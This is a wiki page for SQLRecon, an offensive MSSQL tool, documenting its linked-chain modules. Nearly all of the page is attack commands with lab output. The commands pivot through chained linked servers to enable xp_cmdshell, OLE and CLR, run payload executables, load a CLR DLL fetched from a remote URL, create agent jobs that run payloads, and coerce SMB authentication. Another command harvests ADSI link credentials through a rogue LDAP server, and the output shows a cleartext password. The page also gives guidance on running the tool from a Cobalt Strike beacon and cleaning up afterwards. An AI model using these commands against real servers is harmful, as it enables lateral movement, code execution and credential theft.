-
Notifications
You must be signed in to change notification settings - Fork 115
6. Linked Chain Modules
Sanjiv Kawa edited this page Dec 17, 2024
·
3 revisions
Linked chain modules are executed on the final server in a chain of linked SQL servers.
We use the links module to demonstrate that SQL01 has a link to SQL02.
> SQLRecon.exe /a:WinToken /h:SQL01 /m:links
[*] Executing the 'links' module on SQL01
| Linked Server | product | provider | data_source | Local Login | Is Self Mapping | Remote Login |
| ------------- | ---------- | -------- | ----------- | ----------- | --------------- | ------------ |
| SQL02 | SQL Server | SQLNCLI | SQL02 | N/A | | |
| SQL03 | SQL Server | SQLNCLI | SQL03 | N/A | | |
We then use the links module with SQL02 set as a linked SQL server, and see that SQL02 has a link to SQL03.
> SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:links
[*] Executing the 'links' on SQL02 via SQL01
| Linked Server | product | provider | data_source | Local Login | Is Self Mapping | Remote Login |
| ------------- | ---------- | -------- | ----------- | ----------- | --------------- | ------------ |
| SQL03 | SQL Server | SQLNCLI | SQL03 | N/A | False | sa |
We can then use the /chain command to identify if SQL03 has any links. To do this, we need to specify the chained execution path, which will be /l:SQL02,SQL03. The links module will be executed on SQL03 as it is the final server in the list.
> SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /m:links /chain
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'links' module on SQL03
| Linked Server | product | provider | data_source | Local Login | Is Self Mapping | Remote Login |
| ------------- | ----------------------------------- | ------------ | ------------------- | ----------- | --------------- | -------------- |
| LINKADSI | Active Directory Service Interfaces | ADsDSOObject | dc01.kawalabs.local | N/A | False | kawalabs\admin |
| MECM01 | SQL Server | SQLNCLI | MECM01 | N/A | False | sa |
We can now see that SQL03 has a link to MECM01. If we want to execute a module on MECM01, all we have to do is add SQL03 into the link chain. In the example below, an initial connection is made to SQL01, and a chain is created to tunnel SQL queries through SQL02 and SQL03 before finally executing a desired module on MECM01.
> SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /m:enableclr /chain
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'enableclr' module on MECM01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | --------------------------------------------- |
| 1562 | clr enabled | 1 | 1 | CLR user code execution enabled in the server |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:info
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'info' module on MECM01
| Object | Value |
| ------------------------- | ------------------------------------- |
| ComputerName | MECM01 |
| DomainName | KAWALABS |
| ServicePid | 2496 |
| rpc_OsMachineType | ServerNT |
| rpc_OsVersion | Windows Server 2022 Standard |
| SqlServerServiceName | MSSQLSERVER |
| rpc_SqlServiceAccountName | KAWALABS\mssql_svc |
| rpc_AuthenticationMode | Windows and SQL Server Authentication |
| rpc_ForcedEncryption | 0 |
| Clustered | No |
| SqlVersionNumber | 16.0.1000.6 |
| SqlMajorVersionNumber | 2022 |
| SqlServerEdition | Developer Edition (64-bit) |
| SqlServerServicePack | RTM |
| OsArchitecture | X64 |
| OsVersionNumber | 2022 |
| CurrentLogon | sa |
| ActiveSessions | 3 |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:whoami
Expected Output:
[*] Executing the 'whoami' module on MECM01
[*] Logged in as sa
[*] Mapped to the user dbo
[*] Server Permissions:
| permission_name |
| --------------------------------------------- |
| CONNECT SQL |
| SHUTDOWN |
| CREATE ENDPOINT |
| CREATE ANY DATABASE |
| CREATE AVAILABILITY GROUP |
| CREATE LOGIN |
| ALTER ANY LOGIN |
| ALTER ANY CREDENTIAL |
| ALTER ANY ENDPOINT |
| ALTER ANY LINKED SERVER |
| ALTER ANY CONNECTION |
| ALTER ANY DATABASE |
| ALTER RESOURCES |
| ALTER SETTINGS |
| ALTER TRACE |
| ALTER ANY AVAILABILITY GROUP |
| ADMINISTER BULK OPERATIONS |
| AUTHENTICATE SERVER |
| EXTERNAL ACCESS ASSEMBLY |
| VIEW ANY DATABASE |
| VIEW ANY SECURITY DEFINITION |
| VIEW ANY PERFORMANCE DEFINITION |
| VIEW ANY DEFINITION |
| VIEW SERVER SECURITY STATE |
| VIEW SERVER PERFORMANCE STATE |
| VIEW SERVER STATE |
| CREATE DDL EVENT NOTIFICATION |
| CREATE TRACE EVENT NOTIFICATION |
| ALTER ANY EVENT NOTIFICATION |
| ALTER SERVER STATE |
| UNSAFE ASSEMBLY |
| ALTER ANY SERVER AUDIT |
| CREATE SERVER ROLE |
| ALTER ANY SERVER ROLE |
| CREATE ANY EVENT SESSION |
| DROP ANY EVENT SESSION |
| ALTER ANY EVENT SESSION OPTION |
| ALTER ANY EVENT SESSION ADD EVENT |
| ALTER ANY EVENT SESSION DROP EVENT |
| ALTER ANY EVENT SESSION ENABLE |
| ALTER ANY EVENT SESSION DISABLE |
| ALTER ANY EVENT SESSION ADD TARGET |
| ALTER ANY EVENT SESSION DROP TARGET |
| ALTER ANY EVENT SESSION |
| CONNECT ANY DATABASE |
| IMPERSONATE ANY LOGIN |
| SELECT ALL USER SECURABLES |
| VIEW ANY CRYPTOGRAPHICALLY SECURED DEFINITION |
| VIEW ANY ERROR LOG |
| VIEW SERVER SECURITY AUDIT |
| CONTROL SERVER |
[*] Database Access:
| name |
| -------- |
| master |
| tempdb |
| model |
| msdb |
| Payments |
[*] Database Permissions:
| permission_name |
| -------------------------------------------- |
| CREATE TABLE |
| CREATE VIEW |
| CREATE PROCEDURE |
| CREATE FUNCTION |
| CREATE RULE |
| CREATE DEFAULT |
| BACKUP DATABASE |
| BACKUP LOG |
| CREATE DATABASE |
| CREATE TYPE |
| CREATE ASSEMBLY |
| CREATE XML SCHEMA COLLECTION |
| CREATE SCHEMA |
| CREATE SYNONYM |
| CREATE AGGREGATE |
| CREATE ROLE |
| CREATE MESSAGE TYPE |
| CREATE SERVICE |
| CREATE CONTRACT |
| CREATE REMOTE SERVICE BINDING |
| CREATE ROUTE |
| CREATE QUEUE |
| CREATE SYMMETRIC KEY |
| CREATE ASYMMETRIC KEY |
| CREATE EXTERNAL LANGUAGE |
| CREATE EXTERNAL LIBRARY |
| CREATE FULLTEXT CATALOG |
| CREATE CERTIFICATE |
| CREATE DATABASE DDL EVENT NOTIFICATION |
| CREATE USER |
| CONNECT |
| CONNECT REPLICATION |
| CHECKPOINT |
| SUBSCRIBE QUERY NOTIFICATIONS |
| AUTHENTICATE |
| SHOWPLAN |
| ALTER ANY USER |
| ALTER ANY ROLE |
| ALTER ANY APPLICATION ROLE |
| ALTER ANY COLUMN ENCRYPTION KEY |
| ALTER ANY COLUMN MASTER KEY |
| ALTER ANY SCHEMA |
| ALTER ANY ASSEMBLY |
| ALTER ANY DATABASE SCOPED CONFIGURATION |
| ALTER ANY DATASPACE |
| ALTER ANY EXTERNAL DATA SOURCE |
| ALTER ANY EXTERNAL FILE FORMAT |
| ALTER ANY EXTERNAL LIBRARY |
| ALTER ANY EXTERNAL LANGUAGE |
| ALTER ANY EXTERNAL STREAM |
| ALTER ANY EXTERNAL JOB |
| ALTER ANY MESSAGE TYPE |
| ALTER ANY CONTRACT |
| ALTER ANY SERVICE |
| ALTER ANY REMOTE SERVICE BINDING |
| ALTER ANY ROUTE |
| ALTER ANY FULLTEXT CATALOG |
| ALTER ANY SYMMETRIC KEY |
| ALTER ANY ASYMMETRIC KEY |
| ALTER ANY CERTIFICATE |
| ALTER ANY SECURITY POLICY |
| SELECT |
| INSERT |
| UPDATE |
| DELETE |
| REFERENCES |
| EXECUTE |
| ALTER ANY DATABASE DDL TRIGGER |
| ALTER ANY DATABASE EVENT NOTIFICATION |
| ALTER ANY DATABASE AUDIT |
| CREATE ANY DATABASE EVENT SESSION |
| DROP ANY DATABASE EVENT SESSION |
| ALTER ANY DATABASE EVENT SESSION OPTION |
| ALTER ANY DATABASE EVENT SESSION ADD EVENT |
| ALTER ANY DATABASE EVENT SESSION DROP EVENT |
| ALTER ANY DATABASE EVENT SESSION ENABLE |
| ALTER ANY DATABASE EVENT SESSION DISABLE |
| ALTER ANY DATABASE EVENT SESSION ADD TARGET |
| ALTER ANY DATABASE EVENT SESSION DROP TARGET |
| ALTER ANY DATABASE EVENT SESSION |
| KILL DATABASE CONNECTION |
| VIEW ANY COLUMN ENCRYPTION KEY DEFINITION |
| VIEW ANY COLUMN MASTER KEY DEFINITION |
| VIEW DATABASE SECURITY STATE |
| VIEW DATABASE PERFORMANCE STATE |
| VIEW DATABASE STATE |
| VIEW SECURITY DEFINITION |
| VIEW PERFORMANCE DEFINITION |
| VIEW DEFINITION |
| TAKE OWNERSHIP |
| ALTER |
| ALTER ANY MASK |
| UNMASK |
| EXECUTE ANY EXTERNAL SCRIPT |
| ADMINISTER DATABASE BULK OPERATIONS |
| ALTER ANY SENSITIVITY CLASSIFICATION |
| VIEW ANY SENSITIVITY CLASSIFICATION |
| VIEW CRYPTOGRAPHICALLY SECURED DEFINITION |
| ENABLE LEDGER |
| ALTER LEDGER |
| VIEW LEDGER CONTENT |
| EXECUTE ANY EXTERNAL ENDPOINT |
| VIEW DATABASE SECURITY AUDIT |
| ALTER LEDGER CONFIGURATION |
| CONTROL |
[*] Database Roles:
| Role | Membership |
| ----------------- | ---------- |
| public | Yes |
| db_owner | No |
| db_accessadmin | No |
| db_securityadmin | No |
| db_ddladmin | No |
| db_backupoperator | No |
| db_datareader | No |
| db_datawriter | No |
| db_denydatareader | No |
| db_denydatawriter | No |
| sysadmin | Yes |
| setupadmin | Yes |
| serveradmin | Yes |
| securityadmin | Yes |
| processadmin | Yes |
| diskadmin | Yes |
| dbcreator | Yes |
| bulkadmin | Yes |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:users
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'users' module on MECM01
[*] Users in the 'master' database
| username | create_date | modify_date | type | authentication_type |
| ------------------- | ------------------- | ------------------- | ------------ | ------------------- |
| NT AUTHORITY\SYSTEM | 6/7/2023 9:32:08 AM | 6/7/2023 9:32:08 AM | WINDOWS_USER | WINDOWS |
| guest | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | NONE |
| dbo | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | INSTANCE |
[*] Server principals
| name | type_desc | is_disabled | create_date | modify_date |
| ---------------------------- | ------------- | ----------- | --------------------- | --------------------- |
| KAWALABS\JSmith | WINDOWS_LOGIN | False | 6/4/2024 11:15:37 AM | 6/4/2024 11:15:37 AM |
| KAWALABS\acon | WINDOWS_LOGIN | False | 6/4/2024 11:15:37 AM | 6/4/2024 11:15:37 AM |
| NT AUTHORITY\NETWORK SERVICE | WINDOWS_LOGIN | False | 6/7/2023 9:58:19 AM | 6/7/2023 9:58:19 AM |
| MECM01\ConfigMgr_DViewAccess | WINDOWS_GROUP | False | 6/7/2023 9:37:35 AM | 6/7/2023 9:37:35 AM |
| NT AUTHORITY\SYSTEM | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/7/2023 9:32:08 AM |
| NT SERVICE\SQLTELEMETRY | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| NT SERVICE\SQLSERVERAGENT | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| sa | SQL_LOGIN | False | 4/8/2003 9:10:35 AM | 6/6/2023 12:39:59 PM |
| NT SERVICE\MSSQLSERVER | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| NT SERVICE\Winmgmt | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| NT SERVICE\SQLWriter | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| KAWALABS\Domain Admins | WINDOWS_GROUP | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| KAWALABS\mssccm_svc | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| public | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| sysadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| securityadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| serveradmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| setupadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| processadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| diskadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| dbcreator | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| bulkadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:databases
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'databases' module on MECM01
| dbid | name | crdate | filename |
| ---- | ------ | -------------------- | --------------------------------------------------------------------------------- |
| 1 | master | 4/8/2003 9:13:36 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\master.mdf |
| 2 | tempdb | 6/28/2024 7:53:49 PM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\tempdb.mdf |
| 3 | model | 4/8/2003 9:13:36 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\model.mdf |
| 4 | msdb | 10/8/2022 6:31:57 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf |
| 5 | CM_KAW | 6/7/2023 9:23:45 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\CM_KAW.mdf |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:tables /db:master
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'tables' module on SQL03
[*] Tables in 'master'
| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE |
| ------------- | ------------ | --------------------- | ---------- |
| master | dbo | spt_fallback_db | BASE TABLE |
| master | dbo | spt_fallback_dev | BASE TABLE |
| master | dbo | spt_fallback_usg | BASE TABLE |
| master | dbo | spt_values | VIEW |
| master | dbo | spt_monitor | BASE TABLE |
| master | dbo | MSreplication_options | BASE TABLE |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:columns /db:master /table:spt_values
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'columns' module on SQL03
[*] Displaying columns from 'spt_values' in ''
| COLUMN_NAME |
| ----------- |
| name |
| number |
| type |
| low |
| high |
| status |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:rows /db:Payments /table:cc
Expected Output:
[*] Executing the 'rows' on SQL02 via SQL01
[*] Displaying number of rows from 'cc' in 'Payments'
| row_count |
| --------- |
| 31 |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:rows /db:master /table:spt_values
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'rows' module on SQL03
[*] Displaying number of rows from '' in 'spt_values'
| row_count |
| --------- |
| 2574 |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:query /c:"select @@servername"
Expected Output:
[*] Executing the 'query' module on SQL02 via SQL01
[*] Executing 'select @@servername'
| column0 |
| ------- |
| SQL02 |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:smb /unc:\\172.16.10.21\some-path
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'smb' module on MECM01
[*] Sent SMB request request
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:links
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'links' module on SQL03
| Linked Server | product | provider | data_source | Local Login | Is Self Mapping | Remote Login |
| ------------- | ----------------------------------- | ------------ | ------------------- | ----------- | --------------- | -------------- |
| LINKADSI | Active Directory Service Interfaces | ADsDSOObject | dc01.kawalabs.local | N/A | False | kawalabs\admin |
| MECM01 | SQL Server | SQLNCLI | MECM01 | N/A | False | sa |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:impersonate
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'impersonate' module on SQL03
| User | Can Impersonate? |
| ---- | ---------------- |
| sa | True |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:checkrpc
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'checkrpc' module on SQL03
[*] The following SQL servers can have RPC configured.
| name | is_rpc_out_enabled |
| -------- | ------------------ |
| SQL03 | True |
| LINKADSI | False |
| MECM01 | True |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:disablexp
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'disablexp' module on MECM01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | ------------------------------- |
| 16390 | xp_cmdshell | 0 | 0 | Enable or disable command shell |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:enablexp
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'enablexp' module on MECM01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | ------------------------------- |
| 16390 | xp_cmdshell | 1 | 1 | Enable or disable command shell |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:disableole
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'disableole' module on MECM01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ------------------------- | ----- | ------------ | ------------------------------------------- |
| 16388 | Ole Automation Procedures | 0 | 0 | Enable or disable Ole Automation Procedures |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:enableole
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'enableole' module on MECM01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ------------------------- | ----- | ------------ | ------------------------------------------- |
| 16388 | Ole Automation Procedures | 1 | 1 | Enable or disable Ole Automation Procedures |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:disableclr
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'disableclr' module on MECM01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | --------------------------------------------- |
| 1562 | clr enabled | 0 | 0 | CLR user code execution enabled in the server |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:enableclr
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'enableclr' module on MECM01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | --------------------------------------------- |
| 1562 | clr enabled | 1 | 1 | CLR user code execution enabled in the server |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:xpcmd /c:'notepad'
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'xpcmd' module on SQL03
Executing 'notepad'
[*] 'notepad' executed.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:olecmd /c:'c:\temp\payload.exe'
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'olecmd' module on SQL03
[*] Executing 'c:\temp\payload.exe'
[*] Setting sp_oacreate to 'DBYIZIqJ'.
[*] Setting sp_oamethod to 'QMnIADXv'.
[+] Executed command. Destroyed 'DBYIZIqJ' and 'QMnIADXv'.
A custom .NET assembly can be supplied to SQLRecon in three ways:
- Local file path
- SMB file path
- HTTP/S URL
Please refer to sql.cs or hollow.cs to see how to build a custom DLL that is compatible with SQL CLR attacks.
If you are looking to supply the DLL using a local file path, please note that the DLL has to reside on the compromised host. For example, if you are using a C2 framework like Cobalt Strike, you will need to:
- Upload
hollow.dllto the system you have a beacon on. - Then use
inline-ExecuteAssemblyorexecute-assemblyto executeSQLRecon. The location of the DLL on disk should be passed into the/dll:flag. The function which you want executed should be passed into the/function:flag. - You can then delete the DLL after the command has run.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:clr /dll:'c:\temp\sql.dll' /function:CustomFunctionName
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'clr' module on SQL03
[*] c:\temp\sql.dll is 3584 bytes.
[+] Added SHA-512 hash for 'c:\temp\sql.dll' as a trusted assembly with a random name of 'WDRVpYYF'.
[+] Loaded DLL into a new custom assembly called 'KEobiyRS'.
[+] Added the 'KEobiyRS' assembly into a new stored procedure called 'CustomFunctionName'.
[*] Executing payload ...
[*] Cleaning up. Deleting assembly 'KEobiyRS', stored procedure 'CustomFunctionName' and trusted assembly hash 'WDRVpYYF'.
You can also supply the location of a DLL to SQLRecon via a HTTP or HTTPS link. In the example below, I've uploaded sql.dll to an AWS S3 bucket and created a temporary pre-signed URL.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:clr /dll:"https://tempbucket1.s3.us-east-1.amazonaws.com/sql.dll?<snipped>" /function:CustomFunctionName
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'clr' module on SQL03
[+] Downloading DLL from: https://tempbucket1.s3.us-east-1.amazonaws.com/sql.dll?<snipped>
[+] DLL is 3584 bytes.
[+] Added SHA-512 hash for 'https://tempbucket1.s3.us-east-1.amazonaws.com/sql.dll?<snipped>' as a trusted assembly with a random name of 'pOSvCPBU'.
[+] Loaded DLL into a new custom assembly called 'kTMflwIP'.
[+] Added the 'kTMflwIP' assembly into a new stored procedure called 'CustomFunctionName'.
[+] Executing payload ...
[+] Cleaning up. Deleting assembly 'kTMflwIP', stored procedure 'CustomFunctionName' and trusted assembly hash 'pOSvCPBU'.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:agentstatus
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'agentstatus' module on SQL03
[*] SQL agent is running on SQL03.
[*] Agent Jobs on SQL03
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | --------------------- | --------------------- |
| 14f43cd6-62cc-4390-8517-173847103d9a | syspolicy_purge_history | 1 | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:40 AM |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:agentcmd /subsystem:cmdexec /command:'c:\temp\payload.exe
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'agentcmd' module on SQL03
[*] Executing 'c:\temp\payload.exe' using the 'cmdexec' subsystem.
[*] Setting job_name to 'EeiPqCae'.
[*] Setting step_name to 'vmXVGXui'.
[*] Agent Jobs on SQL03
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | --------------------- | --------------------- |
| 14f43cd6-62cc-4390-8517-173847103d9a | syspolicy_purge_history | 1 | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:40 AM |
| 87eb0e31-b263-49a9-a585-a546cdb7086c | EeiPqCae | 1 | 7/2/2024 8:29:08 AM | 7/2/2024 8:29:08 AM |
[*] Executing job 'EeiPqCae' and waiting for 5 seconds ...
[*] Agent Jobs on SQL03
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | --------------------- | --------------------- |
| 14f43cd6-62cc-4390-8517-173847103d9a | syspolicy_purge_history | 1 | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:40 AM |
[+] Deleting job 'EeiPqCae' on SQL03.
PowerShell is the default Agent Job subsystem.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:agentcmd /c:'c:\temp\payload.exe'
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'agentcmd' module on SQL03
[*] Executing 'c:\temp\payload.exe' using the 'powershell' subsystem.
[*] Setting job_name to 'nGpkSNSj'.
[*] Setting step_name to 'VtapCeyI'.
[*] Agent Jobs on SQL03
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | --------------------- | --------------------- |
| 14f43cd6-62cc-4390-8517-173847103d9a | syspolicy_purge_history | 1 | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:40 AM |
| 2d8903dc-b111-4a70-b854-27dd7f99a466 | nGpkSNSj | 1 | 7/2/2024 8:29:16 AM | 7/2/2024 8:29:16 AM |
[*] Executing job 'nGpkSNSj' and waiting for 5 seconds ...
[*] Agent Jobs on SQL03
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | --------------------- | --------------------- |
| 14f43cd6-62cc-4390-8517-173847103d9a | syspolicy_purge_history | 1 | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:40 AM |
[+] Deleting job 'nGpkSNSj' on SQL03.
.\SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:adsi /adsi:linkadsi /lport:30000
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'adsi' module on SQL03
[*] Obtaining ADSI credentials for 'linkadsi'
[+] Added SHA-512 hash for LDAP server assembly to sys.trusted_assemblies with a random name of 'JHAXOsYH'.
[+] Loaded LDAP server assembly into a new custom assembly called 'ldapServer'.
[+] Added the 'ldapServer' assembly into a new stored procedure called 'DlaYGirn'.
[*] Starting a local LDAP server on port 30001.
[*] Executing LDAP solicitation ...
[+] Obtained ADSI link credentials
|-> kawalabs\admin:Password123
[*] Cleaning up. Deleting LDAP server assembly 'ldapServer', stored procedure 'DlaYGirn' and trusted assembly hash 'JHAXOsYH'.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:users /debug
Expected Output:
[*] Debug mode enabled. No SQL queries will be executed.
[DEBUG] CLI Arguments:
|-> /auth:WinToken
|-> /host:SQL01
|-> /link:SQL02,SQL03,MECM01
|-> /chain:
|-> /module:users
|-> /debug:
[DEBUG] Connecting to 'master' on SQL01:1433 using wintoken.
|-> Connection String: Server=SQL01,1433; Database=master; Integrated Security=True; Connect Timeout=3;
|-> Data Source: SQL01,1433
|-> Database: master
|-> Server Version: 16.00.1000
|-> State: Open
|-> Workstation ID: DESKTOP-LF8Q3C6
|-> Packet Size: 8000
|-> Client Connection ID: 50715307-8d6b-4edc-87ad-c4420804618f
|-> Application Name: DESKTOP-LF8Q3C6
[DEBUG] Module: users
|-> Number of required standard arguments: 0
|-> Number of required impersonate arguments: 1
|-> Number of required linked arguments: 2
[DEBUG] Context Selected: Linked
|-> Module: users
|-> Number of required arguments: 2
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'users' module on MECM01
[*] Users in the 'master' database
[DEBUG] Query:
|-> SELECT * FROM OPENQUERY("SQL02", 'SELECT * FROM OPENQUERY("SQL03", ''SELECT * FROM OPENQUERY("MECM01", ''''SELECT name AS username, create_date, modify_date, type_desc AS type, authentication_type_desc AS authentication_type FROM sys.database_principals WHERE type NOT IN (''''''''A'''''''', ''''''''R'''''''', ''''''''X'''''''') AND sid IS NOT null AND name NOT LIKE ''''''''##%'''''''' ORDER BY modify_date DESC;'''')'')')
[*] Server principals
[DEBUG] Query:
|-> SELECT * FROM OPENQUERY("SQL02", 'SELECT * FROM OPENQUERY("SQL03", ''SELECT * FROM OPENQUERY("MECM01", ''''SELECT name, type_desc, is_disabled, create_date, modify_date FROM sys.server_principals WHERE name NOT LIKE ''''''''##%'''''''' ORDER BY modify_date DESC;'''')'')')
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:users /verbose
Expected Output:
[VERBOSE] CLI Arguments:
|-> /auth:WinToken
|-> /host:SQL01
|-> /link:SQL02,SQL03,MECM01
|-> /chain:
|-> /module:users
|-> /verbose:
[VERBOSE] Connecting to 'master' on SQL01:1433 using wintoken.
|-> Connection String: Server=SQL01,1433; Database=master; Integrated Security=True; Connect Timeout=3;
|-> Data Source: SQL01,1433
|-> Database: master
|-> Server Version: 16.00.1000
|-> State: Open
|-> Workstation ID: DESKTOP-LF8Q3C6
|-> Packet Size: 8000
|-> Client Connection ID: 5fa6cbbd-1cd3-4f69-be79-c3d489c693e7
|-> Application Name: DESKTOP-LF8Q3C6
